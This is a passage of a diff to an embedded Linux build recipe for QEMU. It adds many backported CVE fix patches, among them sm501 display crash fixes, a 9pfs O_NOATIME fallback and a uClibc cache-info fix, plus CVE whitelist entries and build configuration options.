+ file://CVE-2020-14415.patch \
+ file://CVE-2020-16092.patch \
+ file://0001-target-mips-Increase-number-of-TLB-entries-on-the-34.patch \
+ file://CVE-2019-20175.patch \
+ file://CVE-2020-24352.patch \
+ file://CVE-2020-25723.patch \
+ file://CVE-2021-20203.patch \
+ file://CVE-2021-3392.patch \
+ file://CVE-2020-25085.patch \
+ file://CVE-2020-25624_1.patch \
+ file://CVE-2020-25624_2.patch \
+ file://CVE-2020-25625.patch \
+ file://CVE-2020-29443.patch \
+ file://CVE-2021-20221.patch \
+ file://CVE-2021-20181.patch \
+ file://CVE-2021-3416_1.patch \
+ file://CVE-2021-3416_2.patch \
+ file://CVE-2021-3416_3.patch \
+ file://CVE-2021-3416_5.patch \
+ file://CVE-2021-3416_6.patch \
+ file://CVE-2021-3416_7.patch \
+ file://CVE-2021-3416_8.patch \
+ file://CVE-2021-3416_9.patch \
+ file://CVE-2021-3416_10.patch \
+ file://CVE-2021-20257.patch \
+ file://CVE-2021-3544.patch \
+ file://CVE-2021-3544_2.patch \
+ file://CVE-2021-3544_3.patch \
+ file://CVE-2021-3544_4.patch \
+ file://CVE-2021-3544_5.patch \
+ file://CVE-2021-3545.patch \
+ file://CVE-2021-3546.patch \
+ file://CVE-2021-3527-1.patch \
+ file://CVE-2021-3527-2.patch \
+ file://CVE-2021-3582.patch \
+ file://CVE-2021-3607.patch \
+ file://CVE-2021-3608.patch \
+ file://CVE-2020-12829_1.patch \
+ file://CVE-2020-12829_2.patch \
+ file://CVE-2020-12829_3.patch \
+ file://CVE-2020-12829_4.patch \
+ file://CVE-2020-12829_5.patch \
+ file://CVE-2020-27617.patch \
+ file://CVE-2020-28916.patch \
+ file://CVE-2021-3682.patch \
+ file://CVE-2020-13253_1.patch \
+ file://CVE-2020-13253_2.patch \
+ file://CVE-2020-13253_3.patch \
+ file://CVE-2020-13253_4.patch \
+ file://CVE-2020-13253_5.patch \
+ file://CVE-2020-13791.patch \
+ file://CVE-2022-35414.patch \
+ file://CVE-2020-27821.patch \
+ file://CVE-2020-13754-1.patch \
+ file://CVE-2020-13754-2.patch \
+ file://CVE-2020-13754-3.patch \
+ file://CVE-2020-13754-4.patch \
+ file://CVE-2021-3713.patch \
+ file://CVE-2021-3748.patch \
+ file://CVE-2021-3930.patch \
+ file://CVE-2021-4206.patch \
+ file://CVE-2021-4207.patch \
+ file://CVE-2022-0216-1.patch \
+ file://CVE-2022-0216-2.patch \
+ file://CVE-2021-3750.patch \
+ file://CVE-2021-3638.patch \
+ file://CVE-2021-20196.patch \
+ file://CVE-2021-3507.patch \
+ file://hw-block-nvme-refactor-nvme_addr_read.patch \
+ file://hw-block-nvme-handle-dma-errors.patch \
+ file://CVE-2021-3929.patch \
+ file://CVE-2022-4144.patch \
+ file://CVE-2020-15859.patch \
+ file://CVE-2020-15469-1.patch \
+ file://CVE-2020-15469-2.patch \
+ file://CVE-2020-15469-3.patch \
+ file://CVE-2020-15469-4.patch \
+ file://CVE-2020-15469-5.patch \
+ file://CVE-2020-15469-6.patch \
+ file://CVE-2020-15469-7.patch \
+ file://CVE-2020-15469-8.patch \
+ file://CVE-2020-35504.patch \
+ file://CVE-2020-35505.patch \
+ file://CVE-2022-26354.patch \
+ file://CVE-2021-3409-1.patch \
+ file://CVE-2021-3409-2.patch \
+ file://CVE-2021-3409-3.patch \
+ file://CVE-2021-3409-4.patch \
+ file://CVE-2021-3409-5.patch \
+ file://hw-display-qxl-Pass-requested-buffer-size-to-qxl_phy.patch \
+ file://CVE-2023-0330.patch \
+ file://CVE-2023-3354.patch \
+ file://CVE-2023-3180.patch \
+ file://CVE-2020-24165.patch \
+ file://CVE-2023-5088.patch \
+ file://9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch \
+ file://CVE-2023-2861.patch \
+ "
UPSTREAM_CHECK_REGEX = "qemu-(?P<pver>\d+(\.\d+)+)\.tar"
SRC_URI[md5sum] = "278eeb294e4b497e79af7a57e660cb9a"
SRC_URI[sha256sum] = "d3481d4108ce211a053ef15be69af1bdd9dde1510fda80d92be0f6c3e98768f0"
+# Applies against virglrender < 0.6.0 and not qemu itself
+CVE_CHECK_WHITELIST += "CVE-2017-5957"
+
+# The VNC server can expose host files under some circumstances. We don't
+# enable it by default.
+CVE_CHECK_WHITELIST += "CVE-2007-0998"
+
+# 'The issues identified by this CVE were determined to not constitute a vulnerability.'
+# https://bugzilla.redhat.com/show_bug.cgi?id=1609015#c11
+CVE_CHECK_WHITELIST += "CVE-2018-18438"
+
+# the issue introduced in v5.1.0-rc0
+CVE_CHECK_WHITELIST += "CVE-2020-27661"
+
+# As per https://nvd.nist.gov/vuln/detail/CVE-2023-0664
+# https://bugzilla.redhat.com/show_bug.cgi?id=2167423
+# this bug is specific to Windows.
+CVE_CHECK_WHITELIST += "CVE-2023-0664"
+
+# As per https://bugzilla.redhat.com/show_bug.cgi?id=2203387
+# RHEL specific issue
+CVE_CHECK_WHITELIST += "CVE-2023-2680"
+
+# Affected only `qemu-kvm` shipped with Red Hat Enterprise Linux 8.3 release.
+CVE_CHECK_WHITELIST += "CVE-2021-20295"
+
COMPATIBLE_HOST_mipsarchn32 = "null"
COMPATIBLE_HOST_mipsarchn64 = "null"
@@ -195,6 +314,16 @@ PACKAGECONFIG[glusterfs] = "--enable-glusterfs,--disable-glusterfs"
PACKAGECONFIG[xkbcommon] = "--enable-xkbcommon,--disable-xkbcommon,libxkbcommon"
PACKAGECONFIG[libudev] = "--enable-libudev,--disable-libudev,eudev"
PACKAGECONFIG[libxml2] = "--enable-libxml2,--disable-libxml2,libxml2"
+PACKAGECONFIG[seccomp] = "--enable-seccomp,--disable-seccomp,libseccomp"
+PACKAGECONFIG[capstone] = "--enable-capstone,--disable-capstone"
+# libnfs is currently provided by meta-kodi
+PACKAGECONFIG[libnfs] = "--enable-libnfs,--disable-libnfs,libnfs"
+PACKAGECONFIG[brlapi] = "--enable-brlapi,--disable-brlapi"
+PACKAGECONFIG[vde] = "--enable-vde,--disable-vde"
+# version 4.2.0 doesn't have an "internal" option for enable-slirp, so use "git" which uses the same configure code path
+PACKAGECONFIG[slirp] = "--enable-slirp=git,--disable-slirp"
+PACKAGECONFIG[rbd] = "--enable-rbd,--disable-rbd"
+PACKAGECONFIG[rdma] = "--enable-rdma,--disable-rdma"
INSANE_SKIP_${PN} = "arch"
diff --git a/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch b/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch
index 3a7d7bbd33..3789f1edea 100644
--- a/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch
+++ b/meta/recipes-devtools/qemu/qemu/0012-fix-libcap-header-issue-on-some-distro.patch
@@ -60,7 +60,7 @@ Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com>
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/fsdev/virtfs-proxy-helper.c b/fsdev/virtfs-proxy-helper.c
-index 6f132c5f..8329950c 100644
+index 300c9765..2823db7d 100644
--- a/fsdev/virtfs-proxy-helper.c
+++ b/fsdev/virtfs-proxy-helper.c
@@ -13,7 +13,6 @@
@@ -71,9 +71,9 @@ index 6f132c5f..8329950c 100644
#include <sys/fsuid.h>
#include <sys/vfs.h>
#include <sys/ioctl.h>
-@@ -27,7 +26,11 @@
- #include "9p-iov-marshal.h"
+@@ -28,7 +27,11 @@
#include "hw/9pfs/9p-proxy.h"
+ #include "hw/9pfs/9p-util.h"
#include "fsdev/9p-iov-marshal.h"
-
+/*
@@ -84,3 +84,6 @@ index 6f132c5f..8329950c 100644
#define PROGNAME "virtfs-proxy-helper"
#ifndef XFS_SUPER_MAGIC
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/0012-util-cacheinfo-fix-crash-when-compiling-with-uClibc.patch b/meta/recipes-devtools/qemu/qemu/0012-util-cacheinfo-fix-crash-when-compiling-with-uClibc.patch
new file mode 100644
index 0000000000..741a4fce0e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/0012-util-cacheinfo-fix-crash-when-compiling-with-uClibc.patch
@@ -0,0 +1,48 @@
+From 00b5032eaddb7193f03f0a28b10286244d2e2a7b Mon Sep 17 00:00:00 2001
+From: Carlos Santos <casantos@redhat.com>
+Date: Thu, 17 Oct 2019 09:37:13 -0300
+Subject: [PATCH 1/1] util/cacheinfo: fix crash when compiling with uClibc
+
+uClibc defines _SC_LEVEL1_ICACHE_LINESIZE and _SC_LEVEL1_DCACHE_LINESIZE
+but the corresponding sysconf calls returns -1, which is a valid result,
+meaning that the limit is indeterminate.
+
+Handle this situation using the fallback values instead of crashing due
+to an assertion failure.
+
+Signed-off-by: Carlos Santos <casantos@redhat.com>
+Message-Id: <20191017123713.30192-1-casantos@redhat.com>
+Signed-off-by: Richard Henderson <richard.henderson@linaro.org>
+
+Upstream-Status: Backport
+Signed-off-by: Andrei Gherzan <andrei.gherzan@huawei.com>
+---
+ util/cacheinfo.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/util/cacheinfo.c b/util/cacheinfo.c
+index ea6f3e99bf..d94dc6adc8 100644
+--- a/util/cacheinfo.c
++++ b/util/cacheinfo.c
+@@ -93,10 +93,16 @@ static void sys_cache_info(int *isize, int *dsize)
+ static void sys_cache_info(int *isize, int *dsize)
+ {
+ # ifdef _SC_LEVEL1_ICACHE_LINESIZE
+- *isize = sysconf(_SC_LEVEL1_ICACHE_LINESIZE);
++ int tmp_isize = (int) sysconf(_SC_LEVEL1_ICACHE_LINESIZE);
++ if (tmp_isize > 0) {
++ *isize = tmp_isize;
++ }
+ # endif
+ # ifdef _SC_LEVEL1_DCACHE_LINESIZE
+- *dsize = sysconf(_SC_LEVEL1_DCACHE_LINESIZE);
++ int tmp_dsize = (int) sysconf(_SC_LEVEL1_DCACHE_LINESIZE);
++ if (tmp_dsize > 0) {
++ *dsize = tmp_dsize;
++ }
+ # endif
+ }
+ #endif /* sys_cache_info */
+--
+2.30.1
+
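The pattern backported above, in isolation: treat a -1 return from sysconf() as "indeterminate" and keep a fallback value rather than asserting. The sketch below is illustrative only; the 64-byte default and the function name are assumptions, not QEMU code.

    #include <stdio.h>
    #include <unistd.h>

    /* Use sysconf() when it gives a positive answer, otherwise keep a
     * conservative fallback -- the same idea as the patch above. */
    static int dcache_line_size(void)
    {
        int size = 64;                          /* assumed fallback */
    #ifdef _SC_LEVEL1_DCACHE_LINESIZE
        long tmp = sysconf(_SC_LEVEL1_DCACHE_LINESIZE);
        if (tmp > 0) {
            size = (int)tmp;                    /* only trust positive results */
        }
    #endif
        return size;
    }

    int main(void)
    {
        printf("L1 dcache line size: %d bytes\n", dcache_line_size());
        return 0;
    }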
diff --git a/meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch b/meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch
new file mode 100644
index 0000000000..72d9c47bde
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/9pfs-local-ignore-O_NOATIME-if-we-don-t-have-permiss.patch
@@ -0,0 +1,63 @@
+From a5804fcf7b22fc7d1f9ec794dd284c7d504bd16b Mon Sep 17 00:00:00 2001
+From: Omar Sandoval <osandov@fb.com>
+Date: Thu, 14 May 2020 08:06:43 +0200
+Subject: [PATCH] 9pfs: local: ignore O_NOATIME if we don't have permissions
+
+QEMU's local 9pfs server passes through O_NOATIME from the client. If
+the QEMU process doesn't have permissions to use O_NOATIME (namely, it
+does not own the file nor have the CAP_FOWNER capability), the open will
+fail. This causes issues when from the client's point of view, it
+believes it has permissions to use O_NOATIME (e.g., a process running as
+root in the virtual machine). Additionally, overlayfs on Linux opens
+files on the lower layer using O_NOATIME, so in this case a 9pfs mount
+can't be used as a lower layer for overlayfs (cf.
+https://github.com/osandov/drgn/blob/dabfe1971951701da13863dbe6d8a1d172ad9650/vmtest/onoatimehack.c
+and https://github.com/NixOS/nixpkgs/issues/54509).
+
+Luckily, O_NOATIME is effectively a hint, and is often ignored by, e.g.,
+network filesystems. open(2) notes that O_NOATIME "may not be effective
+on all filesystems. One example is NFS, where the server maintains the
+access time." This means that we can honor it when possible but fall
+back to ignoring it.
+
+Acked-by: Christian Schoenebeck <qemu_oss@crudebyte.com>
+Signed-off-by: Omar Sandoval <osandov@fb.com>
+Message-Id: <e9bee604e8df528584693a4ec474ded6295ce8ad.1587149256.git.osandov@fb.com>
+Signed-off-by: Greg Kurz <groug@kaod.org>
+
+Upstream-Status: Backport [https://gitlab.com/qemu-project/qemu/-/commit/a5804fcf7b22fc7d1f9ec794dd284c7d504bd16b]
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ hw/9pfs/9p-util.h | 13 +++++++++++++
+ 1 file changed, 13 insertions(+)
+
+diff --git a/hw/9pfs/9p-util.h b/hw/9pfs/9p-util.h
+index 79ed6b233e5..546f46dc7dc 100644
+--- a/hw/9pfs/9p-util.h
++++ b/hw/9pfs/9p-util.h
+@@ -37,9 +37,22 @@ static inline int openat_file(int dirfd, const char *name, int flags,
+ {
+ int fd, serrno, ret;
+
++again:
+ fd = openat(dirfd, name, flags | O_NOFOLLOW | O_NOCTTY | O_NONBLOCK,
+ mode);
+ if (fd == -1) {
++ if (errno == EPERM && (flags & O_NOATIME)) {
++ /*
++ * The client passed O_NOATIME but we lack permissions to honor it.
++ * Rather than failing the open, fall back without O_NOATIME. This
++ * doesn't break the semantics on the client side, as the Linux
++ * open(2) man page notes that O_NOATIME "may not be effective on
++ * all filesystems". In particular, NFS and other network
++ * filesystems ignore it entirely.
++ */
++ flags &= ~O_NOATIME;
++ goto again;
++ }
+ return -1;
+ }
+
+--
+GitLab
+
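The fallback the patch implements can be shown on its own: treat O_NOATIME as a hint and retry the open without it when the kernel refuses it with EPERM. This is a minimal sketch with an illustrative function name, not the QEMU 9pfs helper.

    #define _GNU_SOURCE             /* O_NOATIME is a GNU extension */
    #include <errno.h>
    #include <fcntl.h>

    static int open_noatime_best_effort(const char *path)
    {
        int flags = O_RDONLY | O_NOATIME;
        int fd;

    again:
        fd = open(path, flags);
        if (fd == -1 && errno == EPERM && (flags & O_NOATIME)) {
            flags &= ~O_NOATIME;    /* hint only: drop it and retry */
            goto again;
        }
        return fd;
    }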
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch
new file mode 100644
index 0000000000..6fee4f640d
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_1.patch
@@ -0,0 +1,164 @@
+From e29da77e5fddf6480e3a0e80b63d703edaec751b Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH] sm501: Convert printf + abort to qemu_log_mask
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Some places already use qemu_log_mask() to log unimplemented features
+or errors but some others have printf() then abort(). Convert these to
+qemu_log_mask() and avoid aborting to prevent guests to easily cause
+denial of service.
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-id: 305af87f59d81e92f2aaff09eb8a3603b8baa322.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 dep#1
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 57 ++++++++++++++++++++++------------------------
+ 1 file changed, 27 insertions(+), 30 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index acc692531a..bd3ccfe311 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -727,8 +727,8 @@ static void sm501_2d_operation(SM501State *s)
+ int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
+
+ if (addressing != 0x0) {
+- printf("%s: only XY addressing is supported.\n", __func__);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: only XY addressing is supported.\n");
++ return;
+ }
+
+ if (rop_mode == 0) {
+@@ -754,8 +754,8 @@ static void sm501_2d_operation(SM501State *s)
+
+ if ((s->twoD_source_base & 0x08000000) ||
+ (s->twoD_destination_base & 0x08000000)) {
+- printf("%s: only local memory is supported.\n", __func__);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n");
++ return;
+ }
+
+ switch (operation) {
+@@ -823,9 +823,9 @@ static void sm501_2d_operation(SM501State *s)
+ break;
+
+ default:
+- printf("non-implemented SM501 2D operation. %d\n", operation);
+- abort();
+- break;
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n",
++ operation);
++ return;
+ }
+
+ if (dst_base >= get_fb_addr(s, crt) &&
+@@ -892,9 +892,8 @@ static uint64_t sm501_system_config_read(void *opaque, hwaddr addr,
+ break;
+
+ default:
+- printf("sm501 system config : not implemented register read."
+- " addr=%x\n", (int)addr);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented system config"
++ "register read. addr=%" HWADDR_PRIx "\n", addr);
+ }
+
+ return ret;
+@@ -948,15 +947,15 @@ static void sm501_system_config_write(void *opaque, hwaddr addr,
+ break;
+ case SM501_ENDIAN_CONTROL:
+ if (value & 0x00000001) {
+- printf("sm501 system config : big endian mode not implemented.\n");
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: system config big endian mode not"
++ " implemented.\n");
+ }
+ break;
+
+ default:
+- printf("sm501 system config : not implemented register write."
+- " addr=%x, val=%x\n", (int)addr, (uint32_t)value);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented system config"
++ "register write. addr=%" HWADDR_PRIx
++ ", val=%" PRIx64 "\n", addr, value);
+ }
+ }
+
+@@ -1207,9 +1206,8 @@ static uint64_t sm501_disp_ctrl_read(void *opaque, hwaddr addr,
+ break;
+
+ default:
+- printf("sm501 disp ctrl : not implemented register read."
+- " addr=%x\n", (int)addr);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register "
++ "read. addr=%" HWADDR_PRIx "\n", addr);
+ }
+
+ return ret;
+@@ -1345,9 +1343,9 @@ static void sm501_disp_ctrl_write(void *opaque, hwaddr addr,
+ break;
+
+ default:
+- printf("sm501 disp ctrl : not implemented register write."
+- " addr=%x, val=%x\n", (int)addr, (unsigned)value);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register "
++ "write. addr=%" HWADDR_PRIx
++ ", val=%" PRIx64 "\n", addr, value);
+ }
+ }
+
+@@ -1433,9 +1431,8 @@ static uint64_t sm501_2d_engine_read(void *opaque, hwaddr addr,
+ ret = 0; /* Should return interrupt status */
+ break;
+ default:
+- printf("sm501 disp ctrl : not implemented register read."
+- " addr=%x\n", (int)addr);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented disp ctrl register "
++ "read. addr=%" HWADDR_PRIx "\n", addr);
+ }
+
+ return ret;
+@@ -1520,9 +1517,9 @@ static void sm501_2d_engine_write(void *opaque, hwaddr addr,
+ /* ignored, writing 0 should clear interrupt status */
+ break;
+ default:
+- printf("sm501 2d engine : not implemented register write."
+- " addr=%x, val=%x\n", (int)addr, (unsigned)value);
+- abort();
++ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2d engine register "
++ "write. addr=%" HWADDR_PRIx
++ ", val=%" PRIx64 "\n", addr, value);
+ }
+ }
+
+@@ -1670,9 +1667,9 @@ static void sm501_update_display(void *opaque)
+ draw_line = draw_line32_funcs[dst_depth_index];
+ break;
+ default:
+- printf("sm501 update display : invalid control register value.\n");
+- abort();
+- break;
++ qemu_log_mask(LOG_GUEST_ERROR, "sm501: update display"
++ "invalid control register value.\n");
++ return;
+ }
+
+ /* set up to draw hardware cursor */
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch
new file mode 100644
index 0000000000..e7258a43d3
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_2.patch
@@ -0,0 +1,139 @@
+From 6f8183b5dc5b309378687830a25e85ea8fb860ea Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH 2/5] sm501: Shorten long variable names in sm501_2d_operation
+
+This increases readability and cleans up some confusing naming.
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Message-id: b9b67b94c46e945252a73c77dfd117132c63c4fb.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 dep#2
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 45 ++++++++++++++++++++++-----------------------
+ 1 file changed, 22 insertions(+), 23 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index bd3ccfe311..f42d05e1e4 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -700,17 +700,16 @@ static inline void hwc_invalidate(SM501State *s, int crt)
+ static void sm501_2d_operation(SM501State *s)
+ {
+ /* obtain operation parameters */
+- int operation = (s->twoD_control >> 16) & 0x1f;
++ int cmd = (s->twoD_control >> 16) & 0x1F;
+ int rtl = s->twoD_control & 0x8000000;
+ int src_x = (s->twoD_source >> 16) & 0x01FFF;
+ int src_y = s->twoD_source & 0xFFFF;
+ int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
+ int dst_y = s->twoD_destination & 0xFFFF;
+- int operation_width = (s->twoD_dimension >> 16) & 0x1FFF;
+- int operation_height = s->twoD_dimension & 0xFFFF;
++ int width = (s->twoD_dimension >> 16) & 0x1FFF;
++ int height = s->twoD_dimension & 0xFFFF;
+ uint32_t color = s->twoD_foreground;
+- int format_flags = (s->twoD_stretch >> 20) & 0x3;
+- int addressing = (s->twoD_stretch >> 16) & 0xF;
++ int format = (s->twoD_stretch >> 20) & 0x3;
+ int rop_mode = (s->twoD_control >> 15) & 0x1; /* 1 for rop2, else rop3 */
+ /* 1 if rop2 source is the pattern, otherwise the source is the bitmap */
+ int rop2_source_is_pattern = (s->twoD_control >> 14) & 0x1;
+@@ -721,12 +720,12 @@ static void sm501_2d_operation(SM501State *s)
+ /* get frame buffer info */
+ uint8_t *src = s->local_mem + src_base;
+ uint8_t *dst = s->local_mem + dst_base;
+- int src_width = s->twoD_pitch & 0x1FFF;
+- int dst_width = (s->twoD_pitch >> 16) & 0x1FFF;
++ int src_pitch = s->twoD_pitch & 0x1FFF;
++ int dst_pitch = (s->twoD_pitch >> 16) & 0x1FFF;
+ int crt = (s->dc_crt_control & SM501_DC_CRT_CONTROL_SEL) ? 1 : 0;
+ int fb_len = get_width(s, crt) * get_height(s, crt) * get_bpp(s, crt);
+
+- if (addressing != 0x0) {
++ if ((s->twoD_stretch >> 16) & 0xF) {
+ qemu_log_mask(LOG_UNIMP, "sm501: only XY addressing is supported.\n");
+ return;
+ }
+@@ -758,20 +757,20 @@ static void sm501_2d_operation(SM501State *s)
+ return;
+ }
+
+- switch (operation) {
++ switch (cmd) {
+ case 0x00: /* copy area */
+ #define COPY_AREA(_bpp, _pixel_type, rtl) { \
+ int y, x, index_d, index_s; \
+- for (y = 0; y < operation_height; y++) { \
+- for (x = 0; x < operation_width; x++) { \
++ for (y = 0; y < height; y++) { \
++ for (x = 0; x < width; x++) { \
+ _pixel_type val; \
+ \
+ if (rtl) { \
+- index_s = ((src_y - y) * src_width + src_x - x) * _bpp; \
+- index_d = ((dst_y - y) * dst_width + dst_x - x) * _bpp; \
++ index_s = ((src_y - y) * src_pitch + src_x - x) * _bpp; \
++ index_d = ((dst_y - y) * dst_pitch + dst_x - x) * _bpp; \
+ } else { \
+- index_s = ((src_y + y) * src_width + src_x + x) * _bpp; \
+- index_d = ((dst_y + y) * dst_width + dst_x + x) * _bpp; \
++ index_s = ((src_y + y) * src_pitch + src_x + x) * _bpp; \
++ index_d = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \
+ } \
+ if (rop_mode == 1 && rop == 5) { \
+ /* Invert dest */ \
+@@ -783,7 +782,7 @@ static void sm501_2d_operation(SM501State *s)
+ } \
+ } \
+ }
+- switch (format_flags) {
++ switch (format) {
+ case 0:
+ COPY_AREA(1, uint8_t, rtl);
+ break;
+@@ -799,15 +798,15 @@ static void sm501_2d_operation(SM501State *s)
+ case 0x01: /* fill rectangle */
+ #define FILL_RECT(_bpp, _pixel_type) { \
+ int y, x; \
+- for (y = 0; y < operation_height; y++) { \
+- for (x = 0; x < operation_width; x++) { \
+- int index = ((dst_y + y) * dst_width + dst_x + x) * _bpp; \
++ for (y = 0; y < height; y++) { \
++ for (x = 0; x < width; x++) { \
++ int index = ((dst_y + y) * dst_pitch + dst_x + x) * _bpp; \
+ *(_pixel_type *)&dst[index] = (_pixel_type)color; \
+ } \
+ } \
+ }
+
+- switch (format_flags) {
++ switch (format) {
+ case 0:
+ FILL_RECT(1, uint8_t);
+ break;
+@@ -824,14 +823,14 @@ static void sm501_2d_operation(SM501State *s)
+
+ default:
+ qemu_log_mask(LOG_UNIMP, "sm501: not implemented 2D operation: %d\n",
+- operation);
++ cmd);
+ return;
+ }
+
+ if (dst_base >= get_fb_addr(s, crt) &&
+ dst_base <= get_fb_addr(s, crt) + fb_len) {
+- int dst_len = MIN(fb_len, ((dst_y + operation_height - 1) * dst_width +
+- dst_x + operation_width) * (1 << format_flags));
++ int dst_len = MIN(fb_len, ((dst_y + height - 1) * dst_pitch +
++ dst_x + width) * (1 << format));
+ if (dst_len) {
+ memory_region_set_dirty(&s->local_mem_region, dst_base, dst_len);
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch
new file mode 100644
index 0000000000..c647028cfe
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_3.patch
@@ -0,0 +1,47 @@
+From 2824809b7f8f03ddc6e2b7e33e78c06022424298 Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH 3/5] sm501: Use BIT(x) macro to shorten constant
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-id: 124bf5de8d7cf503b32b377d0445029a76bfbd49.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 dep#3
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 5 ++---
+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+diff --git a/hw/display/sm501.c b/hw/display/sm501.c
+index f42d05e1e4..97660090bb 100644
+--- a/hw/display/sm501.c
++++ b/hw/display/sm501.c
+@@ -701,7 +701,7 @@ static void sm501_2d_operation(SM501State *s)
+ {
+ /* obtain operation parameters */
+ int cmd = (s->twoD_control >> 16) & 0x1F;
+- int rtl = s->twoD_control & 0x8000000;
++ int rtl = s->twoD_control & BIT(27);
+ int src_x = (s->twoD_source >> 16) & 0x01FFF;
+ int src_y = s->twoD_source & 0xFFFF;
+ int dst_x = (s->twoD_destination >> 16) & 0x01FFF;
+@@ -751,8 +751,7 @@ static void sm501_2d_operation(SM501State *s)
+ }
+ }
+
+- if ((s->twoD_source_base & 0x08000000) ||
+- (s->twoD_destination_base & 0x08000000)) {
++ if (s->twoD_source_base & BIT(27) || s->twoD_destination_base & BIT(27)) {
+ qemu_log_mask(LOG_UNIMP, "sm501: only local memory is supported.\n");
+ return;
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch
new file mode 100644
index 0000000000..485af05e1e
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-12829_4.patch
@@ -0,0 +1,100 @@
+From 3d0b096298b5579a7fa0753ad90968b27bc65372 Mon Sep 17 00:00:00 2001
+From: BALATON Zoltan <balaton@eik.bme.hu>
+Date: Thu, 21 May 2020 21:39:44 +0200
+Subject: [PATCH 4/5] sm501: Clean up local variables in sm501_2d_operation
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Make variables local to the block they are used in to make it clearer
+which operation they are needed for.
+
+Signed-off-by: BALATON Zoltan <balaton@eik.bme.hu>
+Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com>
+Message-id: ae59f8138afe7f6a5a4a82539d0f61496a906b06.1590089984.git.balaton@eik.bme.hu
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+Upstream-Status: Backport
+CVE: CVE-2020-12829 dep#4
+Signed-off-by: Armin Kuster <akuster@mvista.com>
+
+---
+ hw/display/sm501.c | 31 ++++++++++++++++---------------
+ 1 file changed, 16 insertions(+), 15 deletions(-)
+
